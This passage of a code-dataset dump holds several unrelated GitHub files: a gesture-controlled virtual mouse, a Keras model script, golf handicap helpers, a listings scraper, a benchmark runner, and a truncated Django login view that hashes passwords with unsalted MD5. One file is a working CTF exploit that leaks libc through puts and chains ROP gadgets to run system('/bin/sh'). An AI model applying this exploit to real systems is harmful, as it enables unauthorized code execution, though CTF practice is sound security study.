self.finger\n \n if current_gesture == self.prev_gesture:\n self.frame_count += 1\n else:\n self.frame_count = 0\n\n self.prev_gesture = current_gesture\n\n if self.frame_count > 4 :\n self.ori_gesture = current_gesture\n return self.ori_gesture\n\n# Executes commands according to detected gestures\nclass Controller:\n tx_old = 0\n ty_old = 0\n trial = True\n flag = False\n grabflag = False\n pinchmajorflag = False\n pinchminorflag = False\n pinchstartxcoord = None\n pinchstartycoord = None\n pinchdirectionflag = None\n prevpinchlv = 0\n pinchlv = 0\n framecount = 0\n prev_hand = None\n pinch_threshold = 0.3\n \n def getpinchylv(hand_result):\n dist = round((Controller.pinchstartycoord - hand_result.landmark[8].y)*10,1)\n return dist\n\n def getpinchxlv(hand_result):\n dist = round((hand_result.landmark[8].x - Controller.pinchstartxcoord)*10,1)\n return dist\n \n def changesystembrightness():\n currentBrightnessLv = sbcontrol.get_brightness()/100.0\n currentBrightnessLv += Controller.pinchlv/50.0\n if currentBrightnessLv > 1.0:\n currentBrightnessLv = 1.0\n elif currentBrightnessLv < 0.0:\n currentBrightnessLv = 0.0 \n sbcontrol.fade_brightness(int(100*currentBrightnessLv) , start = sbcontrol.get_brightness())\n \n def changesystemvolume():\n devices = AudioUtilities.GetSpeakers()\n interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\n volume = cast(interface, POINTER(IAudioEndpointVolume))\n currentVolumeLv = volume.GetMasterVolumeLevelScalar()\n currentVolumeLv += Controller.pinchlv/50.0\n if currentVolumeLv > 1.0:\n currentVolumeLv = 1.0\n elif currentVolumeLv < 0.0:\n currentVolumeLv = 0.0\n volume.SetMasterVolumeLevelScalar(currentVolumeLv, None)\n \n def scrollVertical():\n pyautogui.scroll(120 if Controller.pinchlv>0.0 else -120)\n \n \n def scrollHorizontal():\n pyautogui.keyDown('shift')\n pyautogui.keyDown('ctrl')\n pyautogui.scroll(-120 if Controller.pinchlv>0.0 else 
120)\n pyautogui.keyUp('ctrl')\n pyautogui.keyUp('shift')\n\n # Locate Hand to get Cursor Position\n # Stabilize cursor by Dampening\n def get_position(hand_result):\n point = 9\n position = [hand_result.landmark[point].x ,hand_result.landmark[point].y]\n sx,sy = pyautogui.size()\n x_old,y_old = pyautogui.position()\n x = int(position[0]*sx)\n y = int(position[1]*sy)\n if Controller.prev_hand is None:\n Controller.prev_hand = x,y\n delta_x = x - Controller.prev_hand[0]\n delta_y = y - Controller.prev_hand[1]\n\n distsq = delta_x**2 + delta_y**2\n ratio = 1\n Controller.prev_hand = [x,y]\n\n if distsq <= 25:\n ratio = 0\n elif distsq <= 900:\n ratio = 0.07 * (distsq ** (1/2))\n else:\n ratio = 2.1\n x , y = x_old + delta_x*ratio , y_old + delta_y*ratio\n return (x,y)\n\n def pinch_control_init(hand_result):\n Controller.pinchstartxcoord = hand_result.landmark[8].x\n Controller.pinchstartycoord = hand_result.landmark[8].y\n Controller.pinchlv = 0\n Controller.prevpinchlv = 0\n Controller.framecount = 0\n\n # Hold final position for 5 frames to change status\n def pinch_control(hand_result, controlHorizontal, controlVertical):\n if Controller.framecount == 5:\n Controller.framecount = 0\n Controller.pinchlv = Controller.prevpinchlv\n\n if Controller.pinchdirectionflag == True:\n controlHorizontal() #x\n\n elif Controller.pinchdirectionflag == False:\n controlVertical() #y\n\n lvx = Controller.getpinchxlv(hand_result)\n lvy = Controller.getpinchylv(hand_result)\n \n if abs(lvy) > abs(lvx) and abs(lvy) > Controller.pinch_threshold:\n Controller.pinchdirectionflag = False\n if abs(Controller.prevpinchlv - lvy) < Controller.pinch_threshold:\n Controller.framecount += 1\n else:\n Controller.prevpinchlv = lvy\n Controller.framecount = 0\n\n elif abs(lvx) > Controller.pinch_threshold:\n Controller.pinchdirectionflag = True\n if abs(Controller.prevpinchlv - lvx) < Controller.pinch_threshold:\n Controller.framecount += 1\n else:\n Controller.prevpinchlv = lvx\n Controller.framecount = 0\n\n def handle_controls(gesture, hand_result): \n x,y = None,None\n if gesture != Gest.PALM :\n x,y = Controller.get_position(hand_result)\n \n # flag reset\n if gesture != Gest.FIST and Controller.grabflag:\n Controller.grabflag = False\n pyautogui.mouseUp(button = \"left\")\n\n if gesture != Gest.PINCH_MAJOR and Controller.pinchmajorflag:\n Controller.pinchmajorflag = False\n\n if gesture != Gest.PINCH_MINOR and Controller.pinchminorflag:\n Controller.pinchminorflag = False\n\n # implementation\n if gesture == Gest.V_GEST:\n Controller.flag = True\n pyautogui.moveTo(x, y, duration = 0.1)\n\n elif gesture == Gest.FIST:\n if not Controller.grabflag : \n Controller.grabflag = True\n pyautogui.mouseDown(button = \"left\")\n pyautogui.moveTo(x, y, duration = 0.1)\n\n elif gesture == Gest.MID and Controller.flag:\n pyautogui.click()\n Controller.flag = False\n\n elif gesture == Gest.INDEX and Controller.flag:\n pyautogui.click(button='right')\n Controller.flag = False\n\n elif gesture == Gest.TWO_FINGER_CLOSED and Controller.flag:\n pyautogui.doubleClick()\n Controller.flag = False\n\n elif gesture == Gest.PINCH_MINOR:\n if Controller.pinchminorflag == False:\n Controller.pinch_control_init(hand_result)\n Controller.pinchminorflag = True\n Controller.pinch_control(hand_result,Controller.scrollHorizontal, Controller.scrollVertical)\n \n elif gesture == Gest.PINCH_MAJOR:\n if Controller.pinchmajorflag == False:\n Controller.pinch_control_init(hand_result)\n Controller.pinchmajorflag = True\n 
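# Editor note: for the major hand, horizontal pinch drag is mapped to changesystembrightness and vertical drag to changesystemvolume via pinch_control.\n            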
Controller.pinch_control(hand_result,Controller.changesystembrightness, Controller.changesystemvolume)\n \n'''\n---------------------------------------- Main Class ----------------------------------------\n Entry point of Gesture Controller\n'''\n\n\nclass GestureController:\n gc_mode = 0\n cap = None\n CAM_HEIGHT = None\n CAM_WIDTH = None\n hr_major = True # Right Hand by default\n hr_minor = True # Left hand by default\n dom_hand = True\n\n def __init__(self):\n GestureController.gc_mode = 1\n GestureController.cap = cv2.VideoCapture(0)\n GestureController.CAM_HEIGHT = GestureController.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n GestureController.CAM_WIDTH = GestureController.cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n \n def classify_hands(results):\n left , right = None,None\n try:\n handedness_dict = MessageToDict(results.multi_handedness[0])\n if handedness_dict['classification'][0]['label'] == 'Right':\n right = results.multi_hand_landmarks[0]\n else :\n left = results.multi_hand_landmarks[0]\n except:\n pass\n\n try:\n handedness_dict = MessageToDict(results.multi_handedness[1])\n if handedness_dict['classification'][0]['label'] == 'Right':\n right = results.multi_hand_landmarks[1]\n else :\n left = results.multi_hand_landmarks[1]\n except:\n pass\n \n if GestureController.dom_hand == True:\n GestureController.hr_major = right\n GestureController.hr_minor = left\n else :\n GestureController.dom_hand == True\n GestureController.hr_major = left\n GestureController.hr_minor = right\n\n def start(self):\n \n handmajor = HandRecog(HLabel.MAJOR)\n handminor = HandRecog(HLabel.MINOR)\n\n with mp_hands.Hands(max_num_hands = 2,min_detection_confidence=0.5, min_tracking_confidence=0.5) as hands:\n while GestureController.cap.isOpened() and GestureController.gc_mode:\n success, image = GestureController.cap.read()\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n continue\n \n image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = hands.process(image)\n \n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n if results.multi_hand_landmarks: \n GestureController.classify_hands(results)\n handmajor.update_hand_result(GestureController.hr_major)\n handminor.update_hand_result(GestureController.hr_minor)\n\n handmajor.set_finger_state()\n handminor.set_finger_state()\n gest_name = handminor.get_gesture()\n\n if gest_name == Gest.PINCH_MINOR:\n Controller.handle_controls(gest_name, handminor.hand_result)\n else:\n gest_name = handmajor.get_gesture()\n Controller.handle_controls(gest_name, handmajor.hand_result)\n \n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(image, hand_landmarks, mp_hands.HAND_CONNECTIONS)\n else:\n Controller.prev_hand = None\n cv2.imshow('Gesture Controller', image)\n if cv2.waitKey(5) & 0xFF == 13:\n break\n GestureController.cap.release()\n cv2.destroyAllWindows()\n\n# uncomment to run directly\ngc1 = GestureController()\ngc1.start()\n","repo_name":"larymak/Python-project-Scripts","sub_path":"OTHERS/Virtual_Mouse-main/Virtual_Mouse.py","file_name":"Virtual_Mouse.py","file_ext":"py","file_size_in_byte":14175,"program_lang":"python","lang":"en","doc_type":"code","stars":929,"dataset":"github-code","pt":"77"} +{"seq_id":"30751947536","text":"## Define Res-CRANN architecture \nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport keras\nimport matplotlib.pyplot as plt\n\n\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import 
BatchNormalization\nfrom sklearn.metrics import confusion_matrix\nfrom keras.models import model_from_json\nfrom keras.layers import Input\nfrom keras.layers import Activation, Reshape, LSTM, TimeDistributed, Dot, Concatenate\nfrom keras.models import Model\n\n\n## Load pretrained ResNet50 model on our dataset to create ResCRANN model\njson_file = open('model_final_ResNet50_straighten.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\n\n## Load pretrained ResNet50 weights\nloaded_model.load_weights(\"model_final_ResNet50_straighten.h5\")\nprint(\"Loaded model from disk\")\nloaded_model.layers.pop() # Get rid of the classification layer\nloaded_model.layers.pop() # Get rid of the dropout layer\nloaded_model.layers.pop()\n\ninput_tensor = Input(shape=(32, 128, 1)) \ninput_length = Input((1,))\ninput_area = Input((1,))\n\nbase_model = Model(inputs=[loaded_model.input, input_length, input_area],outputs=loaded_model.get_layer('activation_48').output)\nfor layer in loaded_model.layers[:-3]:\n layer.trainable=False\n\nX = base_model([input_tensor, input_length, input_area]) \nprint(X.shape)\nX = Reshape((2*5,2048))(X)\n\nactivations = LSTM(128, return_sequences=True, dropout=0.25)(X)\n\n## Attention layer\nattention = TimeDistributed(Dense(1, activation='tanh'))(activations) \nattention = Flatten()(attention)\nattention = Activation('softmax')(attention)\n\nactivations = Dot(axes=1, normalize=True)([activations, attention])\n\nactivations = Concatenate()([activations, input_length, input_area])\nX = BatchNormalization()(activations)\nX = Dropout(0.5)(X)\noutputs = Dense(24,\n activation='softmax',\n kernel_initializer='he_normal')(X)\n\nResCRANN = Model([input_tensor, input_length, input_area], outputs)\n\n\nResCRANN.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(lr=0.001, epsilon=1e-8),\n metrics=['accuracy'])\n\n\nResCRANN.summary()\n\nhistory_ResCRANN = ResCRANN.fit([X_train, X_length_train, X_area_train], y_train,\n batch_size=64,\n epochs=20,\n verbose=1,\n validation_data=([X_valid, X_length_valid, X_area_valid], y_valid))\n\n\n\n## Serialize model to JSON\nmodel_json = ResCRANN.to_json()\nwith open(\"model_final_ResCRNN.json\", \"w\") as json_file:\n json_file.write(model_json)\n \n## Serialize weights to HDF5\nResCRANN.save_weights(\"model_final_ResCRNN.h5\")\nprint(\"Saved model to disk\") \n\nscore_ResCRANN = ResCRANN.evaluate([X_test, X_length_test, X_area_test], y_test, verbose=0)\nprint('Test loss:', score_ResCRANN[0])\nprint('Test accuracy:', score_ResCRANN[1])\n\naccuracy = history_ResCRANN.history['accuracy']\nval_accuracy = history_ResCRANN.history['val_accuracy']\nloss = history_ResCRANN.history['loss']\nval_loss = history_ResCRANN.history['val_loss']\nepochs = range(len(accuracy))\n\nplt.plot(epochs, accuracy, 'bo', label='Training accuracy')\nplt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\nplt.title('Training accuracy')\nplt.legend()\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training loss')\nplt.legend()\nplt.show()\n\ny_pred = ResCRANN.predict([X_test, X_length_test, X_area_test])\ny_pred = np.argmax(y_pred,1)\ncm = confusion_matrix(np.argmax(y_test,1), y_pred)\n\ndf_cm = pd.DataFrame(cm, range(24),\n range(24))\nplt.figure(figsize = (24,24))\nsn.set(font_scale=1)\nsn.heatmap(df_cm, annot=True,annot_kws={\"size\": 
10})\n","repo_name":"EnsiehKhazaei/Karyotype","sub_path":"classification/Res-CRNN.py","file_name":"Res-CRNN.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"10258467676","text":" \ndef calcHandicap(rounds, diffList):\n handicapDiff = diffList[:]\n x = 0\n total = 0\n if rounds <= 6:\n diffUsed = 1\n elif rounds <=8:\n diffUsed = 2\n elif rounds <= 10:\n diffUsed = 3\n elif rounds <= 12:\n diffUsed = 4\n elif rounds <= 14:\n diffUsed = 5\n elif rounds <= 16:\n diffUsed = 6\n elif rounds == 17:\n diffUsed = 7\n elif rounds == 18:\n diffUsed = 8\n elif rounds == 19:\n diffUsed = 9\n elif rounds >= 20:\n diffUsed = 10 \n while x < diffUsed:\n low = min(handicapDiff)\n handicapDiff.remove(low)\n total = total+low\n x += 1\n handicap = (.96*(total/diffUsed))\n handicap = round(handicap, 2)\n return handicap\n \ndef yearAverages(rounds):\n roundsplayed = len(rounds)\n avgScore = 0\n avgPutts = 0\n avgFH = 0\n avgGIR = 0\n for x in range(0, roundsplayed):\n year = rounds[x].date.year\n avgScore += rounds[x].strokes\n avgPutts += rounds[x].putts\n avgFH += rounds[x].fairways_hit\n avgGIR += rounds[x].gir\n avgScore = avgScore/roundsplayed\n avgPutts = avgPutts/roundsplayed \n avgFH = avgFH/roundsplayed\n avgGIR = avgGIR/roundsplayed\n return (year, roundsplayed, avgScore, avgPutts, avgFH, avgGIR)\n\ndef strokesGraph(rounds):\n scores = []\n for round in rounds:\n scores.append(round.strokes)\n return scores\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"HunterProgram22/golfsite","sub_path":"rounds/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21425653028","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Nicolas Rivet\r\n\"\"\"\r\nimport configparser\r\n\r\nimport requests\r\nfrom lxml import etree as ET\r\n\r\napi_url='http://ws.seloger.com'\r\n\r\ndef define_search(title):\r\n \"\"\"\r\n cp, nb_pieces, nb_chambres, pxmin, pxmax, surfacemin=define_search('Paris_1-5')\r\n \"\"\"\r\n config = configparser.ConfigParser()\r\n config.read('mysearch.ini')\r\n\r\n return config[title]['cp'], \\\r\n config[title]['nb_pieces'], \\\r\n config[title]['nb_chambres'], \\\r\n config[title]['pxmin'], \\\r\n config[title]['pxmax'], \\\r\n config[title]['surfacemin']\r\n\r\n\r\ndef search_buy(cp, nb_pieces=0, nb_chambres=0, pxmin=0, pxmax=0, surfacemin=0):\r\n \"\"\"\r\n r=search_buy(75001, '4,+5', '3,4', 500000, 800000,70)\r\n xml=r.content\r\n r=search_buy(cp, nb_pieces, nb_chambres, pxmin, pxmax, surfacemin)\r\n \"\"\"\r\n api_endpoint=api_url + '/search.xml?idtt=2&cp=' + str(cp)\r\n if nb_pieces!=0:\r\n api_endpoint=api_endpoint + '&np_pieces=' + str(nb_pieces)\r\n if nb_chambres!=0:\r\n api_endpoint=api_endpoint + '&nb_chambres=' + str(nb_chambres)\r\n if pxmin!=0:\r\n api_endpoint=api_endpoint + '&pxmin=' + str(pxmin)\r\n if pxmax!=0:\r\n api_endpoint=api_endpoint + '&pxmax=' + str(pxmax)\r\n if surfacemin!=0:\r\n api_endpoint=api_endpoint + '&surfacemin=' + str(surfacemin)\r\n \r\n print(api_endpoint)\r\n \r\n response = requests.get(api_endpoint)\r\n return response\r\n\r\n \r\ndef look_search(xml):\r\n \r\n tree = ET.fromstring(xml)\r\n idAnnonces=tree.xpath('//recherche//annonces//annonce//idAnnonce')\r\n annonces=[]\r\n for annonce in idAnnonces:\r\n annonces.append(annonce.text)\r\n 
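# Editor note: dtFraicheur is the listing's last-refresh timestamp, collected below alongside each idAnnonce.\r\n    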
dtFraicheurs=tree.xpath('//recherche//annonces//annonce//dtFraicheur')\r\n dts=[]\r\n for dt in dtFraicheurs:\r\n dts.append(dt.text)\r\n return annonces, dts\r\n \r\n\"\"\"\r\nPOST https://outlook.office.com/api/v2.0/me/sendmail\r\n\r\n{\r\n \"Message\": {\r\n \"Subject\": \"Meet for lunch?\",\r\n \"Body\": {\r\n \"ContentType\": \"Text\",\r\n \"Content\": \"The new cafeteria is open.\"\r\n },\r\n \"ToRecipients\": [\r\n {\r\n \"EmailAddress\": {\r\n \"Address\": \"garthf@a830edad9050849NDA1.onmicrosoft.com\"\r\n }\r\n }\r\n ],\r\n \"Attachments\": [\r\n {\r\n \"@odata.type\": \"#Microsoft.OutlookServices.FileAttachment\",\r\n \"Name\": \"menu.txt\",\r\n \"ContentBytes\": \"bWFjIGFuZCBjaGVlc2UgdG9kYXk=\"\r\n }\r\n ]\r\n },\r\n \"SaveToSentItems\": \"false\"\r\n}\r\n\"\"\"\r\n","repo_name":"nrivet84/seloger","sub_path":"seloger.py","file_name":"seloger.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"9490238695","text":"from pwn import *\n\n# Parse our binary file\nelf = ELF(\"./rop\")\n\n# Initialize pwn ROP engine\nrop = ROP(elf)\n\n# Create a debug process and load the libc\np = gdb.debug(\"./rop\",'''\nbreak main\ncontinue''')\n\nlibc = ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")\n# Stage 1: Infering libc address\n\nputs_got = elf.got['puts']\nputs_plt = elf.plt['puts']\nmain_plt = elf.symbols['main']\n\n# Find pop_rdi gadgets\npop_rdi = rop.find_gadget(['pop rdi','ret'])[0]\npayload = b'A'*0x28\n# Build first chain\nrop_chain = [ pop_rdi, # puts prints the content of a pointer stored in rdi, the content is the address of the puts function\n puts_got, # address of a GOT entry for puts\n puts_plt, # address of the puts function \n main_plt # address of the main function\n ]\n\nrop_chain = b''.join([p64(i) for i in rop_chain])\nfirst_payload = payload + rop_chain\nprint(p.recvline())\np.sendline(first_payload)\nreceived = p.recvline().strip()\nputs_addr = u64(received.ljust(8,b'\\x00'))\nlog.success(\"leaked puts addr: \"+ hex(puts_addr))\nlibc.address = puts_addr-libc.symbols['puts']\n\n\n# Stage 2: Exploit the bin/sh\nbin_sh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\nexit = libc.symbols['exit']\n\n# Build second chain\nrop_chain = [ pop_rdi,\n bin_sh,\n system,\n exit\n ]\n\nrop_chain = b''.join([p64(i) for i in rop_chain])\nsecond_payload = payload + rop_chain\nprint(p.recvline())\np.sendline(second_payload)\np.interactive()\n","repo_name":"LalaNguyen/CTF","sub_path":"Year-2020/CSAW/pwn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29724176481","text":"import sys\nimport os\nimport tempfile\nimport time\nimport csv\nimport subprocess\nfrom datetime import datetime\nimport argparse\nfrom multiprocessing import Pool, Lock, Value\nfrom os.path import expanduser\nimport my_utils\n\n# python3 scripts/run_sguard.py --root_info ~/benchmarks/meta/sb-reentrancy-meta.csv --pgmdir ~/benchmarks/reentrancy/ --outdir sGuard_result/ --process 2\n\nHOME = expanduser(\"~\")\nsGUARD = os.path.join (HOME, \"sGuard\")\nBENCH = os.path.join(HOME, 'benchmarks')\n\nLOCK = Lock ()\ncnt = Value ('i', 0)\n\nKILL_TIMEOUT = \"\"\nOUTDIR_ROOT = \"\"\nTOTAL_NUM = 0\n\nfieldnames_time = [\"dataset\", \"file\", \"timeout\", \"time\", \"before\", \"after\"]\nfieldnames_hist = [\"dataset\", \"file\", \"solv\", \"cmd\", \"when\"]\n\nIO = 'io'\nLS = 
'ls'\nRE = 're'\nTX = 'tx'\n\ndef get_pgmdir(dataset):\n pgmdir = \"\"\n if dataset == IO:\n pgmdir = os.path.join(BENCH, 'cve')\n elif dataset == LS:\n pgmdir = os.path.join(BENCH, 'leaking_suicidal')\n elif dataset == RE:\n pgmdir = os.path.join(BENCH, 'reentrancy')\n elif dataset == TX:\n pgmdir = os.path.join(BENCH, 'txorigin')\n assert(pgmdir != \"\")\n return pgmdir\n\ndef run (row):\n dataset = row['dataset']\n fid = row['id']\n fname = fid + \".sol\"\n solv = my_utils.get_solc_version (row)\n main_name = row['main_name']\n pgmdir = get_pgmdir(dataset)\n\n cmd = [\"timeout\", str(KILL_TIMEOUT),\n \"npm\", \"--prefix\", sGUARD, \"run\", \"dev\",\n os.path.join(pgmdir,fname),\n solv,\n os.path.join(OUTDIR_ROOT, dataset),\n main_name]\n \n LOCK.acquire()\n cnt.value += 1\n print (\"processing \" + str(cnt.value) + \"/\" + str(TOTAL_NUM))\n print (\" \".join (cmd))\n LOCK.release()\n\n NOW = str (datetime.now())\n BEFORE = time.time ()\n p = subprocess.Popen (cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout = p.stdout.read()\n AFTER = time.time () # MUST be placed after the previous statement.\n p.wait() # somtimes processes are not immediately killed by 'timeout', so explicitly wait to terminate, in order to get proper return code.\n p.poll () # update p.returncode.\n\n elapsed = AFTER-BEFORE\n timeout = \"\"\n if elapsed >= KILL_TIMEOUT:\n timeout = \"O\"\n assert (p.returncode == 124)\n\n # Record related information\n LOCK.acquire ()\n\n f_res = open (os.path.join (OUTDIR_ROOT, dataset, 'log', fid + \".txt\"), 'w')\n f_time = open (os.path.join (OUTDIR_ROOT, \"time.csv\"), 'a')\n f_history = open (os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'a')\n\n writer_t = csv.DictWriter (f_time, fieldnames=fieldnames_time)\n writer_h = csv.DictWriter (f_history, fieldnames=fieldnames_hist)\n\n f_res.write (stdout.decode(\"utf-8\"))\n writer_t.writerow ({\"dataset\": dataset, \"file\": fname, \"timeout\": timeout, \"time\": str(elapsed), \"before\": str(BEFORE), \"after\": str(AFTER)})\n writer_h.writerow ({\"dataset\": dataset, \"file\": fname, \"solv\":solv, \"cmd\": \" \".join(cmd), \"when\": NOW})\n\n f_res.close()\n f_time.close()\n f_history.close()\n LOCK.release()\n\n\ndef write_csv_header ():\n with open (os.path.join (OUTDIR_ROOT, \"time.csv\"), 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=fieldnames_time)\n writer.writeheader()\n with open (os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=fieldnames_hist)\n writer.writeheader()\n\n\n# Order results according to names of input files\ndef postprocess ():\n with open(os.path.join (OUTDIR_ROOT, \"time.csv\"), 'r') as f_input:\n csv_input = csv.DictReader(f_input)\n data = sorted(csv_input, key=lambda row: row['file'])\n\n with open(os.path.join (OUTDIR_ROOT, \"time.csv\"), 'w') as f_output:\n csv_output = csv.DictWriter(f_output, fieldnames=fieldnames_time)\n csv_output.writeheader()\n csv_output.writerows(data)\n\n with open(os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'r') as f_input:\n csv_input = csv.DictReader(f_input)\n data = sorted(csv_input, key=lambda row: row['file'])\n\n with open(os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'w') as f_output:\n csv_output = csv.DictWriter(f_output, fieldnames=fieldnames_hist)\n csv_output.writeheader()\n csv_output.writerows(data)\n\ndef get_tasks(root_info, dataset, include, exclude, pgmnum):\n rows = []\n with open (root_info, 'r') as fp:\n rows = list(csv.DictReader(fp))\n assert (all(map (lambda row: 
not (row['actual_order'] == \"\"), rows)))\n assert (len(rows)>=1)\n\n include_lst = []\n if include != \"\":\n include_lst = [line.replace(\"\\r\\n\",\"\").replace (\"\\n\",\"\") for line in open(include)]\n rows = list(filter(lambda row: row['id'] in include_lst, rows))\n\n exclude_lst = []\n if exclude != \"\":\n exclude_lst = [line.replace(\"\\r\\n\",\"\").replace (\"\\n\",\"\") for line in open(exclude)]\n rows = list(filter(lambda row: not (row['id'] in exclude_lst), rows))\n\n if pgmnum==None:\n pass\n elif pgmnum>0:\n rows = rows[:pgmnum]\n else:\n assert(False)\n\n rows = list(filter(lambda row: row['dataset'] in dataset, rows))\n\n global TOTAL_NUM\n TOTAL_NUM = len(rows)\n\n return rows\n\n\ndef setup_globals(kill_timeout, outdir_root):\n global KILL_TIMEOUT\n global OUTDIR_ROOT\n\n KILL_TIMEOUT = kill_timeout\n OUTDIR_ROOT = outdir_root\n\n b = KILL_TIMEOUT != \"\" and OUTDIR_ROOT != \"\"\n assert(b)\n\ndef mk_dataset_dirs(dataset, outroot_dir):\n if IO in dataset:\n os.mkdir(os.path.join(outroot_dir, IO))\n os.mkdir(os.path.join(outroot_dir, IO, 'log'))\n os.mkdir(os.path.join(outroot_dir, IO, 'json'))\n os.mkdir(os.path.join(outroot_dir, IO, 'fixed'))\n if RE in dataset:\n os.mkdir(os.path.join(outroot_dir, RE))\n os.mkdir(os.path.join(outroot_dir, RE, 'log'))\n os.mkdir(os.path.join(outroot_dir, RE, 'json'))\n os.mkdir(os.path.join(outroot_dir, RE, 'fixed'))\n if TX in dataset:\n os.mkdir(os.path.join(outroot_dir, TX))\n os.mkdir(os.path.join(outroot_dir, TX, 'log'))\n os.mkdir(os.path.join(outroot_dir, TX, 'json'))\n os.mkdir(os.path.join(outroot_dir, TX, 'fixed'))\n if LS in dataset:\n assert(False)\n\ndef main ():\n parser = argparse.ArgumentParser()\n \n parser.add_argument ('--root_info', type=str)\n parser.add_argument ('--dataset', type=str, help='{io,ls,re,tx}')\n parser.add_argument ('--outdir_root', type=str)\n parser.add_argument ('--kill_timeout', type=int, default=7800)\n parser.add_argument ('--process', type=int)\n parser.add_argument ('--include', type=str, default='', help='program lists to be included')\n parser.add_argument ('--exclude', type=str, default='', help='program lists to be excluded')\n parser.add_argument ('--pgmnum', type=int)\n\n args = parser.parse_args ()\n\n assert(args.pgmnum == None or args.pgmnum > 0)\n\n setup_globals (args.kill_timeout, args.outdir_root)\n\n dataset = [IO, RE, TX] if args.dataset==None else [d for d in args.dataset.split(',')]\n mk_dataset_dirs(dataset, args.outdir_root)\n\n rows = get_tasks (args.root_info, dataset, args.include, args.exclude, args.pgmnum)\n write_csv_header()\n\n BEFORE = time.time()\n pool = Pool (args.process)\n pool.map (run, rows)\n # https://stackoverflow.com/questions/35708371/purpose-of-pool-join-pool-close-in-multiprocessing\n pool.close () # pool.close tells the pool not to accept any new job.\n pool.join () # pool.join tells the pool to wait until all jobs finished then exit, effectively cleaning up the pool.\n AFTER = time.time ()\n\n print (\"Took: \" + str(AFTER-BEFORE))\n with open (os.path.join (OUTDIR_ROOT, 'took.txt'), 'w') as fp:\n fp.write (str (AFTER-BEFORE))\n\n postprocess ()\n\nif __name__ == \"__main__\":\n main ()\n","repo_name":"kupl/SmartFix-Artifact","sub_path":"fix_experiment/scripts/run_sguard.py","file_name":"run_sguard.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"41153346374","text":"\"\"\"\nSearcharr\nSonarr, Radarr & Readarr Telegram Bot\nLog Helper\nBy 
Todd Roberts\nhttps://github.com/toddrob99/searcharr\n\"\"\"\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\n\n\ndef set_up_logger(logger_name, verbose, console):\n if verbose:\n rootLogger = logging.getLogger()\n rootLogger.setLevel(logging.DEBUG)\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG if verbose else logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s - %(levelname)8s - %(name)s(%(thread)s):%(lineno)d - %(message)s\"\n )\n\n if console:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n fileName = f\"{logger_name}.log\"\n logPath = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"logs\")\n if not os.path.exists(logPath):\n os.makedirs(logPath)\n fh = TimedRotatingFileHandler(\n os.path.join(logPath, fileName), when=\"midnight\", interval=1, backupCount=7\n )\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n","repo_name":"toddrob99/searcharr","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"77"} +{"seq_id":"36356984865","text":"import base64\nimport random\nfrom django.db import transaction\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport json\nfrom django.views import View\nfrom .models import UserProfile\nfrom funit.models import ServiceUnit\nimport hashlib\nfrom dtoken.views import make_token\nfrom django.core.cache import cache\nfrom django.core.mail import send_mail\n# from .tasks import asyn_send_active_email\n# from utils.logging_dec import logging_check\nfrom django.conf import settings\nfrom urllib.parse import urlencode\nimport requests\nimport logging\n\nlog_err=logging.getLogger('err')\nlog_inf=logging.getLogger('inf')\n\n\n# 10100 - 10199 异常状态码\n\n# Create your views here.\ndef users(request):\n print('登录')\n json_str = request.body\n json_obj = json.loads(json_str)\n # {'uname': 'guoxiaonao', 'password': '123456', 'phone': '13488873110', 'email': '250919354@qq.com', 'carts': None}\n username = json_obj['name']\n password = json_obj['password']\n # log_inf.info(f'{username}用户登录')\n log_inf.info(f'{username}用户登录系统')\n print(username, password)\n m = hashlib.md5()\n m.update(password.encode())\n password_m = m.hexdigest()\n # 检查参数\n # 检查用户名是否可用\n old_users = UserProfile.objects.filter(username=username, password=password_m)\n # old_users = UserProfile.objects.filter(username=username, password=password)\n if 